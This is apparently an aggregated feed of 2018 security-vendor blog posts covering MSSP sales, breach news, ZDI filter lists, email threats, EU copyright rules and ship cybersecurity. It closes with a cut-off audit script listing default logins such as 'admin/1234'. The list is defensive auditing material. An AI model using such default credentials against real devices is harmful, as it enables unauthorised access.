Lastly, make sure that you have antivirus software installed on all your connected devices, and that you deal with reliable VPN service providers. As in real life, cheap (or free) sometimes ends up costing more. Quality VPNs encrypt your web traffic, do not allow hackers to monitor your online activity and do not let cybercriminals re-route your web traffic to phishing websites. Stay safe!

Download Panda FREE VPN

The post Hola VPN Hack Targets MyEtherWallet Users appeared first on Panda Security Mediacenter.

SN 671: STARTTLS Everywhere

This week we discuss another worrisome trend in malware, another fitness tracking mapping incident and mistake, something to warn our friends and family to ignore, the value of periodically auditing previously-granted web app permissions, when malware gets picky about the machines it infects, another kinda-well-meaning Coinhive service gets abused, what are the implications of D-Link losing control of its code signing cert?, some good news about Android apps, iOS v11.4.1 introduces "USB Restricted Mode"... but is it?, a public service reminder about the need to wipe old thumb drives and memory cards, what about those free USB fans that were handed out at the recent North Korea / US summit?... and then we take a look at eMail's STARTTLS system and the EFF's latest initiative to increase its usefulness and security.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written, Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.


Building a Profitable Security Services Offering Part 2 IT Security Features and Benefits Overview

Trend Micro is excited to partner with SPC International in this 5-part blog, webinar and online training series focused on Building a Profitable Security Services Offering for MSP Partners. Through the series, SPC will teach you a selling process of leading with security, steps in growing your recurring managed security services revenue, and provide you the tools to make it happen.

We value and invest in Trend Micro MSP Partners to help:

 

  • Maximize Your Cash Flow – self-provision licenses, pay-as-you-go monthly billing, no upfront or minimum costs
  • Enhance the Tools You’re Already Using – integration with 3rd party RMM and PSA (Autotask, ConnectWise & Kaseya)
  • Optimize Your Productivity – manage multiple customers from a single console, anywhere, anytime

Building a Profitable Security Services Offering

Introduction

Security is the number one concern of business owners today. This isn’t surprising, with all of the hacks, breaches, data thefts, ransomware attacks and privacy violations that we hear about on a daily basis. And those are just the ones we know about – according to the Online Trust Alliance’s (OTA) “Cyber Incident & Breach Trends Report,” cybersecurity incidents nearly doubled from about 82,000 in 2016 to 160,000 or so in 2017. But the report also notes that this number could easily be more than double that, as so many breaches are unreported.

The necessity to thwart these cybercriminals and protect critical business, financial, healthcare data and more has created a tremendous opportunity for IT service providers to evolve to meet this challenge and benefit from a continually growing revenue stream.

In this 5-part blog series and its companion webinars, I’ll dive deep into the topic of building a profitable security services offering and cover essential topics such as the services that comprise different levels of security offerings, how to lead with security to prospect effectively and set appointments, and how to price, position and sell these services. And once sold, I’ll cover how to properly onboard new clients and share a strategy to continue to realize healthy ongoing security project profits and exponentially growing recurring managed security services revenues on an ongoing basis.

Watch On-Demand Webinar #2, ‘IT Security Services Features and Benefits’ (URL: https://th115.infusionsoft.com/app/page/72b7ce05e5518db3a86601a69720d931)

Part 2: IT Security Features and Benefits Overview

We know that Security is the #1 concern of today’s business owners, regardless of the industry they serve, and strategic leaders understand that they must increase their security posture to protect their data, systems and users against internal and external threats.

Therefore, offering IT security services is a strategic client service and control point for security providers. These high value, high margin services represent a stable, growing revenue opportunity with an extremely low barrier to entry and delivery.

What are Managed IT Security Services? 

Managed IT Security Services are a defined set of onsite or remotely-delivered services that are prepaid for at a fixed rate on a recurring basis, where the security provider assumes complete responsibility for the management and delivery of these security services and their outcome.

In addition, these services are governed by a Service Level Agreement (SLA), and are scheduled, preventative and proactive. By contrast, Managed IT Security Services are not measured by time invested, nor are they reactive services, and they are not billed on a time and materials basis.

The Old Way of delivering security services vs. The New Way 

The old way of delivering security services to clients means that the service provider is most profitable when their client is in the most pain, as the price of reactive, emergency security remediation services is always higher than that of scheduled, monitored, preventative services.

And clients are never prepared to pay for these reactive, costly emergencies, which negatively impact their cash flow and operations, and in extreme cases, their brand, image and customer relationships, and create tension between them and their reactive security provider.

The new way of delivering Managed IT Security Services is much more attractive and beneficial to clients, as the security provider actively seeks out and delivers security solutions to protect their clients’ data and environments from security incidents and manages security risk and response for a flat monthly fee.

Because the Managed Security Services Provider, or MSSP, assumes more risk in the relationship, they must ensure their clients’ security and reduce vulnerabilities if they are to be profitable.

As a result, the MSSP is more profitable when their clients experience fewer threats, and their business goals align with their clients’ in this respect.

This reality creates a much stronger business partnership than a typical vendor relationship for the MSSP and their clients and paves the way for acceptance as a Trusted Advisor.

What comprises a security offering and what are its benefits? 

A basic security portfolio typically includes Firewall Management, Anti-Virus and Anti-Malware solutions, desktop and server operating system security, Email Security, Web Content or URL Filtering, Mobile Security, Data security including Backups, end-user Security Awareness Training and more.

And there are a variety of advantages for a client when engaging an MSSP, including enjoying a high level of confidence that drives continued innovation in their organization, instead of worrying so much about security threats that this concern stifles growth strategies and activities.

Along with improving their compliance posture, clients enjoy rapid detection and remediation of threats at much lower costs than reactive, “after the event” security remediation services, and gain a stronger posture to reduce insider fraud and theft, along with guarding against data leakage.

In addition, a clear path and process to identify and quickly address security incidents brings clients peace of mind, and predictable monthly fees allow them to budget for security more effectively for the long term.

When presented properly to a prospect, these and other factors make a compelling argument to engage in a managed IT security services relationship.

Security Services bundling and pricing 

To provide the best opportunity to engage with as many prospects as possible while maintaining healthy margins, the MSSP will bundle and tier their services to offer various distinct packages, with each successively higher-priced option adding more qualitative value in terms of services and benefits, along with more attractive Service Level Agreements (SLAs) that govern response time. This allows prospects to select the option that makes the most sense for their specific business needs, risk profile and budget.

There are several considerations for the MSSP when determining their pricing model, and they can price their services in several ways, such as per endpoint, per user or as the aforementioned tiered or bundled services. Or they may price strictly on value alone, with each opportunity quoted individually.

Their ultimate pricing strategy will also be informed by other factors, such as their SLAs’ response times and the hours they provide service to their client: 8 to 5 Monday through Friday, 24×7, or on holidays and weekends.

Once the appropriate service bundle or tier is selected by the client, the MSSP will provide them a Scope of Work (SOW) that clearly defines what is included and covered in the service relationship, and what is not. Typically, the SOW covers all of the agreed-upon security maintenance and service work the MSSP delivers for the specified endpoints, devices and users within the SLA.

New users added, or new services or licenses installed or provisioned after service go-live normally fall outside the scope of an existing SOW, and will typically be added to the client’s overall agreement at an increased monthly fee by having the client authorize a new SOW or an addendum to the existing SOW.

And to preserve margins, best-in-class MSSPs will understand the true cost of delivering their services to their clients, including the cost of 3rd-party security products and services they bundle into their offerings, and establish a minimum desired margin for these deliverables.

Using a pricing calculator helps ensure margin attainment and speeds pricing activities. Once the minimum price is established for a client, the security sales professional will try to increase the ultimate price by using consultative sales techniques to sell on value.
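The pricing-calculator idea can be sketched in a few lines. Here is a hypothetical per-endpoint model — the cost figures, margin target and function name are illustrative, not from any real MSSP tool:

```python
# Hypothetical per-endpoint pricing sketch; all figures are illustrative.

def minimum_price(third_party_cost: float, labor_cost: float,
                  min_margin: float = 0.40) -> float:
    """Return the lowest monthly price per endpoint that preserves
    the desired gross margin, where margin = (price - cost) / price."""
    total_cost = third_party_cost + labor_cost
    return total_cost / (1.0 - min_margin)

# Example: $9/month in bundled 3rd-party security tooling plus $6/month
# of delivery labor, with a 40% minimum gross margin target.
price = minimum_price(9.00, 6.00)
print(f"Floor price: ${price:.2f}/endpoint/month")  # Floor price: $25.00/endpoint/month
```

From this floor, the consultative sales conversation then works upward on value, never downward on cost.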

The value of becoming the Trusted Advisor as an MSSP

A Trusted Advisor is a critical business asset for their clients: they work to understand each client’s business needs and priorities, actively seek out solutions that improve daily workflows, processes and procedures, and strengthen security to help their clients reduce risk and reach their business goals.

An effective Trusted Advisor earns their client’s loyalty by understanding both their external competitive challenges and their internal operational challenges. They help their clients advance their value proposition to their target market, and use technology to improve client service, sales, marketing and back-office operational processes so their clients can retain and expand their market base.

These are the reasons that MSSPs operating as mature Trusted Advisors are so successful at consistently identifying up-sell and cross-sell opportunities for new solutions while increasing client satisfaction. Watch On-Demand Webinar #2: ‘IT Security Services Features and Benefits’ (URL: https://th115.infusionsoft.com/app/page/72b7ce05e5518db3a86601a69720d931)

Next time on Building a Profitable Security Services Offering: Part 3: Qualifying Prospects for Security Services and Solutions

About Erick Simpson

Co-Founder, Senior Vice President and CIO of MSP University and SPC International Online, Erick Simpson is a strategic IT business transformation specialist who improves top- and bottom-line business performance by increasing operational and service efficiencies; helps build, grow or improve MSP and Cloud business practices with proven sales, sales engineering, project management and help desk processes; and packages, bundles and tiers profitable MRR service offerings.

With 30+ years of experience in the IT industry as an Enterprise CIO and one of the first pure-play MSPs in the industry (acquired in 2007), Erick is a business process improvement expert with hundreds of successful ITSP, MSP, Security and Cloud improvement engagements, and has worked with numerous clients on the buy, sell and integration sides of the M&A process.

A highly sought-after IT, Cloud, Security and Managed Services business growth specialist and speaker, Erick has authored over 40 business improvement best practice guides and 4 best-selling books, including “The Guide to a Successful Managed Services Practice”, the definitive book on Managed Services, and its follow-ups in his Managed Services Series: “The Best I.T. Sales & Marketing BOOK EVER!”, “The Best I.T. Service Delivery BOOK EVER!” and “The Best NOC and Service Desk Operations BOOK EVER!”

LinkedIn


Apple’s new USB security feature has a major loophole

Apple's new USB Restricted Mode, which dropped with the iOS 11.4.1 release yesterday, may not be as secure as previously thought. The feature is designed to protect iPhones against USB devices used by law enforcement to crack your passcode, and works by disabling USB access after the phone has been locked for an hour. Computer security company ElcomSoft, however, has found a loophole.

Source: ElcomSoft

Cars Are Just Primitive Exoskeletons

The “carriage” form-factor is ancient.

So even though today we say “car” instead of carriage, we should know that to augment a single person’s travel with a giant opulent box is primitive thinking, and obviously doesn’t scale well to meet modern transit needs. Study after study by design experts has shown us how illogical it is to continue to build and use cars:

Fortunately, modern exoskeletons are more suited (no pun intended) to the flexibility of both the traveler and those around them. Rex is a good example of why some data scientists are spending their entire career trying to unravel “gait” in order to analyse and improve the “signature” of human movement. They discuss here how they are improving mobility through augmentation for a particular target audience:

This is early-stage technology, and yet it still shows us how wrong it is to use a car. When I imagine such technology extended to everyone, I picture people putting on a pair of auto-trousers to jog 10 miles at 20 mph to “commute” while exercising, or to lift rubble off people for 12 hours without breaks after an earthquake, or both.

We already see this class of power-assist augmented travel in tiny form-factors in the latest generation of electric bicycles, like the Shimano e8000 motor. It adds power as a cyclist pedals, creating a mixed-drive model:

For what it’s worth, the “gait” (wobble) of bicycles is also super complicated and a rich area of data science research. Robots fail miserably (nice try, Yamaha) to emulate the nuance of controlling/driving two wheels. Anyone saying driverless cars will reduce deaths isn’t looking at why driverless cars are more likely than human drivers to crash into pedestrians and cyclists. Any human can ride a bicycle, but to a driverless car this prediction tree is an impenetrable puzzle:

Unlike sitting in a cage, the possibilities of micro-engines form-fitted to the human body are seemingly endless, just like the branches in that tree. So it makes less and less sense for anyone to want cages for personal transit, unless they’re trying to make a forceful statement by taking up shared space to deny freedom to others.

What is missing in the above sequence of photos? One where cars are completely gone, like bell-bottom trousers, because they waste so much for so little gain, lowering quality of life for everyone involved.

Floating around in a giant private box really is a status thing, when you think about it. It’s a poorly thought out exoskeleton, like a massive blow-up suit or fluffy dress that everyone has to clean up after (and avoid being hit by). Here’s some excellent perspective on the stupidity of carrying forward the carriage design into modern transit:

Rapstatus tells us cars still get a lot of lip service so I suspect we’re a long way from carriages being relegated to ancient history, where they belong.

Nonetheless, I’m told new generations have less patience for carriages, so I hope they already visualize something like this when people ask if they would get in a car to get around…

Timehop admits attacker stole 21 million users’ data

Timehop, a popular app that reminds you of your social media posts from the same day in past years, is the latest service to suffer a data breach. The attacker struck on July 4th, and grabbed a database which included names and/or usernames along with email addresses for around 21 million users. About 4.7 million of those accounts had phone numbers linked to them, which some people use to log in with instead of a Facebook account.

Via: The Register

Source: Timehop

Zero Day Initiative: A 1H2018 Recap

When the Zero Day Initiative (ZDI) was formed in 2005, the cyber threat landscape was a bit different from what we see today. Threats were a little less sophisticated, but there was one thing that we saw then that we still see now: the shortage of cybersecurity professionals and researchers. The team decided that with ZDI, they could augment the internal team with the expertise of external researchers. In addition, ZDI would promote responsible vulnerability disclosure to affected vendors and protect our customers ahead of a vendor patch. As you probably suspected, the launch of ZDI was met with skepticism, with people saying things like “the ZDI is promoting hacking by creating a market for vulnerabilities” and “they’re going to fail,” but the team was determined to make this program work.

Fast forward to 2018. Now in its thirteenth year (coming up on July 25), the ZDI manages the largest vendor-agnostic bug bounty program in the world with over 3,500 external researchers complementing the internal team’s efforts. The surge of over 500 new registered researchers in the first half of 2018 alone is a testament to the appeal and benefits that the ZDI program offers to those who want to conduct responsible security research and be appropriately compensated for their efforts. Since the program’s inception, over $18 million USD has been awarded to external researchers. This is quite an accomplishment given that there was only one submission in the first year of the program. Contributions to the ZDI program have been growing steadily since 2010, and in the first half of 2018, the ZDI published a record-breaking 600 advisories, paying researchers over $1 million USD.

But the benefits of ZDI go beyond the researcher community – Trend Micro customers also benefit from the vulnerability research conducted by the ZDI. The insights on threat and exploit trends that the team sees from external researchers, as well as their own internal research, have led to an increased focus on SCADA and Industrial IoT (IIoT) vulnerabilities, which make up approximately 30% of submissions this year. The ZDI also works very closely with ICS-CERT and was the number one supplier of SCADA/ICS vulnerabilities in 2017. Trend Micro customers also benefit through preemptive protection for vulnerabilities that come through the ZDI program. Patch management is a constant headache for most organizations, and it can become a flat-out nightmare if a zero-day hits and you have hundreds of systems to patch. Filters that are created as a result of the exclusive access to vulnerability information from ZDI provide protection an average of 72 days before a patch is available, and can play a key role in alleviating the patch management headache with a virtual patch at the network level while you work to update systems or wait for a vendor patch. Trend Micro is one of the few security vendors with the breadth and depth of vulnerability research that results in this level of protection coverage. Does every vulnerability submitted to the program get exploited? No. But just like I carry automotive insurance “just in case” I get in a car accident, think of the ZDI program along the same lines – an extra level of protection “just in case” you can’t patch your systems in time, in the event a vulnerability submitted through our program is exploited before a patch is issued by the affected vendor.

The continued growth of the Zero Day Initiative bug bounty program and leadership in vulnerability research can only lead to more secure products and more secure customers. Many vulnerabilities would continue to either remain behind closed doors, or be sold to the black market and used for corrupt purposes. Accountability is paramount to the program, and over the course of 13 years, the ZDI has worked to build trust with leading software vendors and the research community to promote the importance of security in the product development lifecycle. As the threat landscape evolves, the ZDI will evolve with it and stay on the forefront of vulnerability research to make our technology world a safer place.

For more details on the ZDI’s record first half of 2018 and the trends they’re seeing, check out Brian Gorenc’s blog here. You can also follow the team on Twitter at @thezdi for the latest updates.


Emails, the gateway for threats to your company

It’s an undeniable fact: these days, email has become one of the main vectors for cyberattacks against companies.  According to the recent 2018 Email Security Trends report by Barracuda, 87% of IT security professionals have admitted that their company has faced some kind of threat via email in the last year. This has led three quarters of the professionals surveyed to be more concerned about this risk factor now than they were five years ago.

And this concern hasn’t appeared out of the blue. The same study has shown that 81% of heads of corporate IT security have noticed an increase in the number of cases compared to the situation one year ago.  What’s more, a quarter of the professionals who agree with this statement qualify the increase as “drastic”.

But why is the volume of cyberattacks carried out over email on the up?  Just like with other kinds of threats, the success of these attacks can be put down to human error: whether it’s due to a lack of time to stop and assess the authenticity of the email, or because of our innate sense of curiosity or compassion, mechanisms like social engineering do exactly what they set out to achieve. This is the opinion shared by the vast majority of the IT professionals surveyed; they single out “poor employee behavior” as their main concern when dealing with these cyberthreats.

Mitigation costs are rising drastically

The economic consequences of these attacks are also increasing.  81% of heads of cybersecurity agree with this statement, emphasizing, in 22% of cases, that the costs stemming from mitigating a security breach have grown very significantly.

Of the different types of malicious actions that can financially damage a company via email, information theft, ransomware, and BEC scams are the most costly.  In other words, we’re facing two types of cyberattacks: on the one hand, we have attacks that seek to make a profit by attacking a company’s information and either selling it, or kidnapping it in order to demand a ransom. On the other hand, we see attacks whose aim is to trick an employee who has access to the company finances into making a transfer to the cybercriminals without realizing.  In a previous post, we saw how this last kind of scam, Business Email Compromise, became the most lucrative cybercrime of 2017 in the USA.

How can I deal with this threat in my company?

The fact that human error plays such a key role in the success of this kind of scam of course means that companies must train employees at all levels to pay attention to tell-tale signs in suspicious emails: how they’re written, spelling, or the kind of links they contain.  Likewise, they must get into the habit of thoroughly verifying the supposed intention of any emails received: for example, by checking with the finance department that the bank transfer that they are being asked for is legitimate, in order to avoid BEC scams.

But is this enough? The heads of IT security who responded also recommended some other measures that should be kept in mind:

  • Phishing drills: This highly effective method to test the possible negative effects of phishing consists of surprising your employees with this kind of email to see how they react. Those who get tricked will have learned for themselves the type of behavior they must avoid in the future, while those who pass the test will remain as alert as before.
  • Social engineering detection: This requires a specific, practical training process for employees. The aim is to make sure they ask themselves a series of questions before replying or paying attention to a dubious email. Here are some examples of this type of question: “Can a third party help me verify the identity of the person who is contacting me?”, “Am I really authorized to carry out the thing they’re asking me to do?”, “Is the action or information that they are requesting public?”
  • Encrypting emails: To avoid the possible theft of emails containing confidential information, your company must have a system that encrypts all emails sent by employees, making it necessary to introduce an additional password in order to gain access to the content of the email.
  • Having an advanced cybersecurity solution: Using a suite like Panda Adaptive Defense will help you to detect any possible attempts to attack your company via email, thanks to the use of cognitive intelligence and a real time detection system. This way, you will avoid possible financial losses that can result from this kind of cyberattack.
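One of those tell-tale signs — link text that displays one domain while the underlying href points somewhere else — is mechanical enough to check automatically. Below is a toy Python sketch of that single check; the regex-based parsing and domain heuristic are purely illustrative, not a production email filter:

```python
# Toy illustration: flag HTML email links whose visible text shows one
# domain while the href points to a different one -- a classic phishing
# tell. Not a real filter; example addresses are hypothetical.
import re
from urllib.parse import urlparse

LINK_RE = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>',
                     re.IGNORECASE | re.DOTALL)

def suspicious_links(html: str) -> list[str]:
    flagged = []
    for href, text in LINK_RE.findall(html):
        href_domain = urlparse(href).netloc.lower()
        # Does the anchor text itself look like a domain name?
        m = re.search(r'([a-z0-9.-]+\.[a-z]{2,})', text.lower())
        if m and href_domain and m.group(1) not in href_domain:
            flagged.append(href)
    return flagged

body = '<p>Verify now: <a href="http://evil.example.net/login">www.mybank.com</a></p>'
print(suspicious_links(body))  # ['http://evil.example.net/login']
```

A check like this catches only one narrow trick, which is exactly why the training above still matters: humans remain the last line of defense against the signs no heuristic covers.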

The post Emails, the gateway for threats to your company appeared first on Panda Security Mediacenter.

Can we trust our online project management tools?

How would you feel about sharing confidential information about your company on Twitter or Facebook? That doesn’t sound right, does it? So, in a corporate life where we keep our work calendars online, and where we work together on projects using online flow-planners and online project management software, it might pay off to wonder whether the shared content is safe from prying eyes.

What are we looking at?

From the easy-to-use shared document on Google Drive to full-fledged Trello boards that we use to manage complicated projects—basically everything that uses the cloud as a server is our subject here. When evaluating your online project management tools, it is important from a security standpoint to have an overview of:

  • Which online project management platforms are you using?
  • Which data are you sharing on which platforms?
  • Who has access to those data?

Once you know this, you can move on to the main question:

  • Is the data that should stay confidential shielded well enough?

What are the risks?

The risks of using online project management tools are made up of several elements. Once again, a list of questions will help you gauge this, including:

  • How secure is the platform you are using?
  • Do the people that have access to the data need to have access? And are they given access to see all the information that is shared, or just a portion?

As you can see, we are not just worrying about outsiders getting ahold of information. Sometimes, we must keep secrets, even from our own co-workers. Not every company has an open salary policy, for example, so information about how much everyone makes might not be allowed outside of HR.

But the threat of a breach is the most important one. Having the competition know about the latest project your design team is working on can be deadly in some industries. And of course, any project that contains customer data and is not secured can be breached by a cybercriminal. Knowing this, it’s our job to help you find the safest possible tool to perform your job.

Does it make sense to share online?

Are we sharing information online because we need to do it online or just because we can? Sometimes being the cool kids that use an online project management platform that has all the bells and whistles is more a matter of convenience than it is strictly necessary. But if you are:

  • employing remote workers
  • cooperating between offices around the world
  • heavily relying on a BYOD strategy

then online tools may be the only way to realize your project management goals.

Every ounce of prevention

What you don’t share can’t get lost. And control over what you do share (and with whom) is paramount.

  • Limit the amount of privileged information you are sharing. Make sure that only the information needed for the project is being shared with the appropriate team members.
  • Change the login credentials at a regular interval, and do this in a non-predictable way. Going from “passwordMay” to “passwordJune” at the end of the month will not stop nosy co-workers from digging. Do not post the new credentials on the platform, either.
  • Use 2FA where and if possible to enhance login security.
  • Update and patch the software as soon as possible. This limits the risk of anyone abusing a published vulnerability in the platform.
  • Keep tally of who is supposed to have access at all times, and check this against the connected devices when and if you can.
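The credential-rotation advice above — random and non-predictable, sharing nothing with the previous password — can be illustrated with Python's standard `secrets` module. The alphabet and length here are arbitrary choices for the sketch:

```python
# Sketch of non-predictable credential rotation using Python's stdlib
# `secrets` module. Unlike "passwordMay" -> "passwordJune", each rotation
# is cryptographically random and shares nothing with the last one.
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"

def rotate_credential(length: int = 20) -> str:
    """Generate a fresh, unguessable password for the next rotation."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

new_password = rotate_credential()
print(len(new_password))  # 20
```

Distribute the result out-of-band (never on the platform itself, per the list above), and pair it with 2FA so a leaked password alone isn't enough.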

Breach management

Hardening your online tools against breaches is usually in the hands of toolmakers themselves—the software provider or the cloud service provider with whom you’ve partnered. Therefore, it makes sense to look into the project management tool’s reputation for security, as well as its ability to serve your company’s needs. While you can’t control the security of the tool itself, you can limit the consequences of a mishap, should it occur, by doing the following:

  • Don’t try to keep it a secret when credentials have been found in the wrong hands. Making participants aware of the situation helps them to change passwords and follow up with other appropriate actions.
  • Make sure there are backups of important data. Someone with unauthorized access may believe in burning the bridges behind them.
  • In case of a breach, try your best to find out exactly how it happened. Was there a vulnerability in the tool? Did a team member open up a malicious attachment? This will assist you in preventing similar attacks.

Controlling the risks

Working in the cloud can be useful for project management, but sometimes we need a reminder that there are risks involved. If you set up an online project management tool or other cloud-based project, it’s good to be aware of these risks and give some thought to the ways you can limit them.

When you’re working on a project for your company—whether it’s leading a team or participating in the project’s development—it’s important to make data losses as rare as possible, to learn from your mistakes, and to handle breaches and other security incidents responsibly.

Stay safe out there!

The post Can we trust our online project management tools? appeared first on Malwarebytes Labs.

Zero-Day Coverage Update – Week of July 2, 2018

The General Data Protection Regulation (GDPR) has been up and running for a couple of months now and your organization is compliant. It’s time to take a little break – well, not so fast! Late last week, the State of California passed a new data privacy law called the California Consumer Privacy Act of 2018. Set to go into effect on January 1, 2020, it is being regarded as the strongest digital privacy policy in the United States. While it’s not as comprehensive as GDPR, there is opportunity for additional revisions to the law, since it was passed by the legislature just in time to withdraw the proposed law from the November ballot. Had the initiative ended up on the ballot, any amendments to the existing text would be next to impossible. There will be much more discussion on this as the deadline gets closer. In the meantime, you can check to see if your organization is GDPR compliant by visiting www.trendmicro.com/gdpr.

Zero-Day Filters

There are 29 new zero-day filters covering eight vendors in this week’s Digital Vaccine (DV) package. A number of existing filters in this week’s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of published advisories and upcoming advisories on the Zero Day Initiative website. You can also follow the Zero Day Initiative on Twitter @thezdi and on their blog.

ABB (4)

  • 32331: ZDI-CAN-6144: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32332: ZDI-CAN-6143: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32334: ZDI-CAN-6142: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32336: ZDI-CAN-6136: Zero Day Initiative Vulnerability (ABB Panel Builder 800)

Advantech (3)

  • 32353: ZDI-CAN-6300: Zero Day Initiative Vulnerability (Advantech WebAccess Node)
  • 32354: ZDI-CAN-6301: Zero Day Initiative Vulnerability (Advantech WebAccess Node)
  • 32356: ZDI-CAN-6302: Zero Day Initiative Vulnerability (Advantech WebAccess Node)

Delta (1)

  • 32348: ZDI-CAN-6322: Zero Day Initiative Vulnerability (Delta Industrial Automation PMSoft)

Foxit (4)

  • 32343: ZDI-CAN-6332: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32345: ZDI-CAN-6330: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32346: ZDI-CAN-6329: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32347: ZDI-CAN-6326: Zero Day Initiative Vulnerability (Foxit Reader)

LAquis SCADA (1)

  • 32351: ZDI-CAN-6319: Zero Day Initiative Vulnerability (LAquis SCADA)

Microsoft (2)

  • 32350: ZDI-CAN-6080: Zero Day Initiative Vulnerability (Microsoft Windows)
  • 32352: ZDI-CAN-6081: Zero Day Initiative Vulnerability (Microsoft Windows)

Quest (2)

  • 32342: ZDI-CAN-6075: Zero Day Initiative Vulnerability (Quest KACE Systems Management)
  • 32355: ZDI-CAN-6095: Zero Day Initiative Vulnerability (Quest KACE Systems Management)

WECON (12)

  • 32257: ZDI-CAN-5956: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32319: ZDI-CAN-5924: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32323: ZDI-CAN-5938: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32324: ZDI-CAN-5931: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32325: ZDI-CAN-5929,5930: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32326: ZDI-CAN-5928: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32328: ZDI-CAN-5925,5926: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32329: ZDI-CAN-5927: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32330: ZDI-CAN-6062: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32333: ZDI-CAN-6063,6065: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32335: ZDI-CAN-6064: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32339: ZDI-CAN-6067: Zero Day Initiative Vulnerability (WECON LeviStudioU)

Missed Last Week’s News?

Catch up on last week’s news in my weekly recap.


Is Article 13 about to ruin the Internet?

European lawmakers were set to vote on 5th July on changes that would dramatically increase Internet regulation. Perhaps the biggest proposed change is the introduction of Article 13, which is intended to improve copyright protection.

Under the terms of Article 13, any Internet platform that hosts “large amounts” of user-uploaded content is expected to monitor every submission. This means identifying and removing any content that infringes copyright.

Blocking copyright infringement is good…

Content creators – like musicians and filmmakers – rely on their work to provide an income. When people reuse that content, the original creator loses out. Some people would say that it is no different to stealing food from your local supermarket.

Obviously protecting copyright is incredibly important to these people. And it is for their protection that Article 13 has been created.

…but auto-blocking isn’t

According to the latest statistics, 60 hours of videos are uploaded to YouTube every minute. It would be physically impossible to employ people to check each film for copyright infringements (unlicensed clips or background music). Instead, content platform owners like Facebook, Flickr and YouTube will need to develop an automated system to analyse content as it is uploaded.

The problem is that automated systems tend to be pretty poor. YouTube has tried content scanning in the past – Content ID – which was notorious for creating false positives, blocking perfectly legitimate movies in the process.

A more sinister future?

Some Internet experts are concerned about the longer term implications of Article 13, suggesting that the new regulations could be misused. They believe that the law creates a new surveillance framework that could be easily subverted by totalitarian governments to curb free speech.

Internet blackouts and bans on sites that are perceived as anti-government are already a regular occurrence in Turkey, Iran and China. These experiences suggest that the fear of government interference is not entirely unwarranted.

Linking to sites could be expensive

Have you ever shared a link to a news article on your Facebook page? Another update to the regulation – Article 11 – defines a new tax on platforms for linking to news articles. In future, Facebook could be charged because you share a link to a BBC News story.

With millions of pages being shared every day, Facebook will face a huge bill for the activities of their users. In order to protect their profits, Facebook may ban links to news websites, or even charge users for the service.

Decision time

The proposed changes have already passed scrutiny and will be approved (or denied) by MEPs today. Article 13 (and other amendments) will then be written into law and applied by all member states in due course. Importantly firms based outside the European Union will be expected to adhere to the new regulations.

Unfortunately, it is almost impossible to plan for the new regulation because the European Union has not specified exactly how the link tax or copyright filter will work. Should Articles 11 and 13 become law, the way you use the web may change forever.

Download Panda FREE VPN

The post Is Article 13 about to ruin the Internet? appeared first on Panda Security Mediacenter.

BSides Springfield Preview: How To DevOps (While Sneaking in Security)

As companies embrace the DevOps phenomenon in hopes of producing applications at a faster rate, they are also introducing insecure software into the digital ecosystem. DevOps, itself, is a software lifecycle movement which blends developmental and operational tasks together to accelerate application-building in a quick, clean, and repetitive manner for faster time-to-market. In DevOps environments, […]… Read More

The post BSides Springfield Preview: How To DevOps (While Sneaking in Security) appeared first on The State of Security.

Tripwire Patch Priority Index for June 2018

Tripwire’s June 2018 Patch Priority Index (PPI) brings together the top vulnerabilities from Microsoft and Adobe. First on the patch priority list this month are patches for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These Adobe Flash patches address type confusion, integer overflow, out-of-bounds read and stack-based buffer overflow vulnerabilities. Note that […]… Read More

The post Tripwire Patch Priority Index for June 2018 appeared first on The State of Security.

Danger on board: shipping routes are at risk

Updates to the cybersecurity ecosystem seem to have gotten lost at sea for the shipping industry. Measures that have been outdated for years in other sectors are still in force on the high seas, meaning that ships are susceptible to being robbed, hacked, and even sunk. Vessels that were traditionally isolated are, thanks to the Internet of things and advances in technology, now always online via VSAT, GSM/LTE and WiFi connections, and have complex electronic navigation systems.

Discover Panda Adaptive Defense

A study by Pen Test Partners has shown how easy it is to gain access to a vessel in the shipping industry.  Some of the access methods presented are truly worrying: exposed satellite communication terminals, user interfaces accessed via insecure protocols, default login details that have never been modified… The list goes on. In this industry, a cyberattack would have an enormous economic and business impact, since maritime transport moves goods totaling millions of Euros all around the world.

Satellite communications: a threat in motion

Thanks to Shodan, a search engine for Internet-connected IoT devices, the Pen Test researchers discovered in previous investigations that some satellite antenna systems were easily identifiable through old firmware or unauthenticated connections.  When attempting to gain access to these systems, and ultimately hack them, they came across dangerous default login details, like “admin/1234”.
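The scale of this problem is easy to illustrate with a toy audit script. The sketch below (all host names, credentials, and function names are hypothetical examples, not taken from the Pen Test Partners study) screens a device inventory against a short list of well-known factory defaults:

```python
# Toy illustration: flag factory-default credentials such as "admin/1234".
# The credential list and device records below are hypothetical examples.
KNOWN_DEFAULTS = {
    ("admin", "1234"),
    ("admin", "admin"),
    ("root", "root"),
}

def uses_default_login(username: str, password: str) -> bool:
    """Return True if the username/password pair is a well-known default."""
    return (username.lower(), password) in KNOWN_DEFAULTS

# Example device inventory, as an auditor might compile from terminal configs.
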